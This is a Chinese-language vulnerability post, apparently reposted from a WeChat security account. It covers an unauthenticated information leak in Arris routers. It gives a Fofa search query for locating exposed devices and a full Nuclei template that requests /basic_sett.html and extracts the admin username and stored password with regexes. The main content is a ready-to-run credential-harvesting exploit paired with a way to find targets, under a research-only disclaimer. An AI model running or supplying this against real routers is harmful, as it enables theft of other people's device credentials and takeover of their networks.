arris路由器basic_sett未授权信息泄露

admin 2025年4月19日21:25:27评论10 views字数 831阅读2分46秒阅读模式

漏洞描述

arris 路由器 basic_sett 未授权信息泄露,攻击者可通过此漏洞获取敏感信息。

漏洞复现

1、Fofa

body="base64encode(document.tF.pws.value)" || body="ARRIS TR3300"

arris路由器basic_sett未授权信息泄露
arris路由器basic_sett未授权信息泄露
id: arris-route-basic_sett-unauth

info:
  name: arris-route-basic_sett-unauth
  author: unknow
  severity: high
  description: arris 路由器 basic_sett 存在未授权信息泄露漏洞。
  tags: arris,unauth
  metadata:
    fofa-qeury: body="base64encode(document.tF.pws.value)" || body="ARRIS TR3300"


http:
  - raw:
      - |
        GET /basic_sett.html HTTP/1.1
        Host: 
        User-Agent: Mozilla/5.0 

    extractors:
      - type: regex
        name: user
        part: body
        group: 1
        regex:
          - 'name="login_user" value="(.*)" disabled'

      - type: regex
        name: password
        part: body
        group: 1
        regex:
          - 'cur_passwd" value="(.*)"'             

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 && contains_all(body,"name="cur_passwd" value="Q0JCM0NCQjNDQkIz"")'

原文始发于微信公众号(骇客安全):arris路由器basic_sett未授权信息泄露

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月19日21:25:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   arris路由器basic_sett未授权信息泄露http://cn-sec.com/archives/3977960.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息